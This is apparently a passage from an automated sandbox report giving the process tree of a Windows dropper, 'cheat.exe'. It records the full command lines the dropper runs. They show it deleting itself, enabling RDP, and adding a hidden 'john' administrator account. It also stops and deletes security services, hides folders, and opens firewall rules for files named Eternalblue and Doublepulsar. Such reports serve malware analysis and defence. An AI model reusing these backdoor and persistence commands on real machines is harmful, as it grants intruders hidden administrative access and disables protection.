        Delays execution with timeout.exe
        
        PID:2408
- C:\ProgramData\install\sys.exe
  C:\ProgramData\install\sys.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Checks processor information in registry
  - Suspicious use of WriteProcessMemory
  PID:3028
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "sys.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3124
  - - C:\Windows\SysWOW64\timeout.exe
      C:\Windows\system32\timeout.exe 3
      4⤵
      Delays execution with timeout.exe
      PID:1028
- C:\programdata\install\cheat.exe
  C:\programdata\install\cheat.exe -pnaxui
  2⤵
  - Executes dropped EXE
  PID:2180
- - C:\ProgramData\Microsoft\Intel\taskhost.exe
    "C:\ProgramData\Microsoft\Intel\taskhost.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Suspicious use of SetWindowsHookEx
    PID:1968
  - - C:\Programdata\RealtekHD\taskhostw.exe
      C:\Programdata\RealtekHD\taskhostw.exe
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      NTFS ADS
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of SetWindowsHookEx
      PID:3356
    - - C:\Programdata\WindowsTask\winlogon.exe
        
        C:\Programdata\WindowsTask\winlogon.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:3160
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /C schtasks /query /fo list
        6⤵
        
        PID:2116
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /query /fo list
        7⤵
        
        PID:1872
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ipconfig /flushdns
        5⤵
        
        PID:4304
      - C:\Windows\system32\ipconfig.exe
        
        ipconfig /flushdns
        6⤵
        Gathers network information
        
        PID:4392
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c gpupdate /force
        5⤵
        
        PID:4432
      - C:\Windows\system32\gpupdate.exe
        
        gpupdate /force
        6⤵
        
        PID:4532
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny Администраторы:(F)
      4⤵
      PID:4048
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny Администраторы:(F)
        5⤵
        Modifies file permissions
        
        PID:396
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny System:(F)
      4⤵
      PID:3404
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny System:(F)
        5⤵
        
        PID:1500
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny система:(F)
      4⤵
      PID:3840
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny система:(F)
        5⤵
        
        PID:2060
  - - C:\programdata\microsoft\intel\R8.exe
      C:\programdata\microsoft\intel\R8.exe
      4⤵
      Executes dropped EXE
      Modifies registry class
      Suspicious use of SetWindowsHookEx
      PID:820
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
        5⤵
        
        PID:3224
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
        6⤵
        Modifies registry class
        
        PID:2032
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        7⤵
        Kills process with taskkill
        
        PID:2036
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        7⤵
        Kills process with taskkill
        
        PID:3412
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        7⤵
        Delays execution with timeout.exe
        
        PID:2148
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        7⤵
        
        PID:1532
        
        C:\rdp\Rar.exe
        
        "Rar.exe" e -p555 db.rar
        7⤵
        Executes dropped EXE
        
        PID:3848
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        7⤵
        Kills process with taskkill
        
        PID:1932
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        7⤵
        Delays execution with timeout.exe
        
        PID:4156
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
        7⤵
        
        PID:4820
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
        8⤵
        
        PID:4944
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
        9⤵
        
        PID:5032
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
        9⤵
        
        PID:5080
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
        9⤵
        
        PID:5108
        
        C:\Windows\SysWOW64\net.exe
        
        net.exe user "john" "12345" /add
        9⤵
        
        PID:4176
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user "john" "12345" /add
        10⤵
        
        PID:4128
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        9⤵
        
        PID:2572
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Администраторы" "John" /add
        9⤵
        
        PID:4728
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
        10⤵
        
        PID:4180
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administratorzy" "John" /add
        9⤵
        
        PID:4980
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
        10⤵
        
        PID:2288
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administrators" John /add
        9⤵
        
        PID:5024
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administrators" John /add
        10⤵
        
        PID:4380
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administradores" John /add
        9⤵
        
        PID:4684
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administradores" John /add
        10⤵
        
        PID:4636
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Пользователи удаленного рабочего стола" John /add
        9⤵
        
        PID:4988
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
        10⤵
        
        PID:4524
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Пользователи удаленного управления" John /add
        9⤵
        
        PID:4396
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
        10⤵
        
        PID:4280
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Remote Desktop Users" John /add
        9⤵
        
        PID:4116
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
        10⤵
        
        PID:4596
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Usuarios de escritorio remoto" John /add
        9⤵
        
        PID:748
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
        10⤵
        
        PID:864
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Uzytkownicy pulpitu zdalnego" John /add
        9⤵
        
        PID:4552
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
        10⤵
        
        PID:4744
        
        C:\rdp\RDPWInst.exe
        
        "RDPWInst.exe" -i -o
        9⤵
        Executes dropped EXE
        Modifies WinLogon
        Drops file in Program Files directory
        
        PID:4756
        
        C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        10⤵
        
        PID:5960
        
        C:\rdp\RDPWInst.exe
        
        "RDPWInst.exe" -w
        9⤵
        Executes dropped EXE
        
        PID:4672
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
        9⤵
        
        PID:4540
        
        C:\Windows\SysWOW64\net.exe
        
        net accounts /maxpwage:unlimited
        9⤵
        
        PID:4664
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 accounts /maxpwage:unlimited
        10⤵
        
        PID:4616
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
        9⤵
        Drops file in Program Files directory
        Views/modifies file attributes
        
        PID:1444
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\Program Files\RDP Wrapper"
        9⤵
        Drops file in Program Files directory
        Views/modifies file attributes
        
        PID:4600
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\rdp"
        9⤵
        Views/modifies file attributes
        
        PID:5236
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        7⤵
        Delays execution with timeout.exe
        
        PID:4840
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc start appidsvc
      4⤵
      PID:752
    - - C:\Windows\SysWOW64\sc.exe
        
        sc start appidsvc
        5⤵
        
        PID:2220
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc start appmgmt
      4⤵
      PID:1004
    - - C:\Windows\SysWOW64\sc.exe
        
        sc start appmgmt
        5⤵
        
        PID:3308
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
      4⤵
      PID:3812
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config appidsvc start= auto
        5⤵
        
        PID:1372
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
      4⤵
      PID:3312
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config appmgmt start= auto
        5⤵
        
        PID:3468
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete swprv
      4⤵
      PID:2236
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete swprv
        5⤵
        
        PID:3868
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc stop mbamservice
      4⤵
      PID:2348
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop mbamservice
        5⤵
        
        PID:4108
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
      4⤵
      PID:4168
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop bytefenceservice
        5⤵
        
        PID:4220
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
      4⤵
      PID:4240
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete bytefenceservice
        5⤵
        
        PID:4284
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete mbamservice
      4⤵
      PID:4348
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete mbamservice
        5⤵
        
        PID:4404
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete crmsvc
      4⤵
      PID:4440
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete crmsvc
        5⤵
        
        PID:4520
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete "windows node"
      4⤵
      PID:4580
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete "windows node"
        5⤵
        
        PID:4624
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer
      4⤵
      PID:4648
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop Adobeflashplayer
        5⤵
        
        PID:4692
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer
      4⤵
      PID:4716
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete AdobeFlashPlayer
        5⤵
        
        PID:4872
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc stop MoonTitle
      4⤵
      PID:4732
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop MoonTitle
        5⤵
        
        PID:4900
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete MoonTitle"
      4⤵
      PID:4976
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete MoonTitle"
        5⤵
        
        PID:5056
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64
      4⤵
      PID:2260
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop clr_optimization_v4.0.30318_64
        5⤵
        
        PID:1036
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"
      4⤵
      PID:2720
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete clr_optimization_v4.0.30318_64"
        5⤵
        
        PID:4200
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql
      4⤵
      PID:4188
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop MicrosoftMysql
        5⤵
        
        PID:4264
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql
      4⤵
      PID:2204
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete MicrosoftMysql
        5⤵
        
        PID:4528
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
      4⤵
      PID:4400
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall set allprofiles state on
        5⤵
        
        PID:4556
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
      4⤵
      PID:4376
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
        5⤵
        
        PID:4480
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
      4⤵
      PID:888
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
        5⤵
        
        PID:4592
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
      4⤵
      PID:4700
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
        5⤵
        
        PID:4660
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
      4⤵
      PID:4828
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
        5⤵
        
        PID:4736
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
      4⤵
      PID:4920
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
        5⤵
        
        PID:5088
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
      4⤵
      PID:5104
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
        5⤵
        
        PID:4224
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
      4⤵
      PID:1140
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
        5⤵
        
        PID:4260
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
      4⤵
      PID:4288
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
        5⤵
        
        PID:4492
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
      4⤵
      PID:4340
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
        5⤵
        
        PID:4804
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
      4⤵
      PID:4748
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
        5⤵
        
        PID:4940
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
      4⤵
      PID:4668
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
        5⤵
        
        PID:4772
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
      4⤵
      PID:4204
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
        5⤵
        
        PID:4824
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
      4⤵
      PID:4244
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
        5⤵
        
        PID:4364
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
      4⤵
      PID:4212
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
        5⤵
        
        PID:4832
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
      4⤵
      PID:4360
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
        5⤵
        
        PID:4800
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
      4⤵
      PID:4352
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
        5⤵
        
        PID:4908
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
      4⤵
      PID:4704
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
        5⤵
        
        PID:4776
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
      4⤵
      PID:5068
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
        5⤵
        
        PID:4416
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
      4⤵
      PID:2248
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
        5⤵
        
        PID:4104
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
      4⤵
      PID:4196
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
        5⤵
        
        PID:4688
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP1" protocol=TCP action=block dir=IN remoteip=61.216.5.1-61.216.5.255
      4⤵
      PID:4332
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP1" protocol=TCP action=block dir=IN remoteip=61.216.5.1-61.216.5.255
        5⤵
        
        PID:4852
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP2" protocol=TCP action=block dir=out remoteip=61.216.5.1-61.216.5.255
      4⤵
      PID:3676
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP2" protocol=TCP action=block dir=out remoteip=61.216.5.1-61.216.5.255
        5⤵
        
        PID:868
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP3" protocol=TCP action=block dir=IN remoteip=118.184.176.1-118.184.176.255
      4⤵
      PID:4208
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP3" protocol=TCP action=block dir=IN remoteip=118.184.176.1-118.184.176.255
        5⤵
        
        PID:4584
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP4" protocol=TCP action=block dir=out remoteip=118.184.176.1-118.184.176.255
      4⤵
      PID:5084
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP4" protocol=TCP action=block dir=out remoteip=118.184.176.1-118.184.176.255
        5⤵
        
        PID:4304
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP5" protocol=TCP action=block dir=IN remoteip=163.171.140.1-163.171.140.255
      4⤵
      PID:4344
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP5" protocol=TCP action=block dir=IN remoteip=163.171.140.1-163.171.140.255
        5⤵
        
        PID:4928
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP6" protocol=TCP action=block dir=out remoteip=163.171.140.1-163.171.140.255
      4⤵
      PID:4796
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP6" protocol=TCP action=block dir=out remoteip=163.171.140.1-163.171.140.255
        5⤵
        
        PID:4184
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP7" protocol=TCP action=block dir=IN remoteip=160.153.246.1-160.153.246.255
      4⤵
      PID:4236
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP7" protocol=TCP action=block dir=IN remoteip=160.153.246.1-160.153.246.255
        5⤵
        
        PID:3856
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP8" protocol=TCP action=block dir=out remoteip=160.153.246.1-160.153.246.255
      4⤵
      PID:4788
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP8" protocol=TCP action=block dir=out remoteip=160.153.246.1-160.153.246.255
        5⤵
        
        PID:4848
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP9" protocol=TCP action=block dir=IN remoteip=195.22.26.1-195.22.26.255
      4⤵
      PID:4912
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP9" protocol=TCP action=block dir=IN remoteip=195.22.26.1-195.22.26.255
        5⤵
        
        PID:4676
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP10" protocol=TCP action=block dir=out remoteip=195.22.26.1-195.22.26.248
      4⤵
      PID:5116
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP10" protocol=TCP action=block dir=out remoteip=195.22.26.1-195.22.26.248
        5⤵
        
        PID:4808
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP11" protocol=TCP action=block dir=IN remoteip=59.125.179.1-59.125.179.255
      4⤵
      PID:4320
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP11" protocol=TCP action=block dir=IN remoteip=59.125.179.1-59.125.179.255
        5⤵
        
        PID:2932
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP12" protocol=TCP action=block dir=out remoteip=59.125.179.1-59.125.179.255
      4⤵
      PID:5100
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP12" protocol=TCP action=block dir=out remoteip=59.125.179.1-59.125.179.255
        5⤵
        
        PID:4272
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP13" protocol=TCP action=block dir=IN remoteip=59.124.90.1-59.124.90.255
      4⤵
      PID:5048
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP13" protocol=TCP action=block dir=IN remoteip=59.124.90.1-59.124.90.255
        5⤵
        
        PID:1624
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP14" protocol=TCP action=block dir=out remoteip=59.124.90.1-59.124.90.255
      4⤵
      PID:5112
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP14" protocol=TCP action=block dir=out remoteip=59.124.90.1-59.124.90.255
        5⤵
        
        PID:4084
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP15" protocol=TCP action=block dir=IN remoteip=172.104.56.113
      4⤵
      PID:5092
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP15" protocol=TCP action=block dir=IN remoteip=172.104.56.113
        5⤵
        
        PID:5052
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP16" protocol=TCP action=block dir=OUT remoteip=172.104.56.113
      4⤵
      PID:4656
    - - C:\Windows\SysWOW64\netsh.exe
        
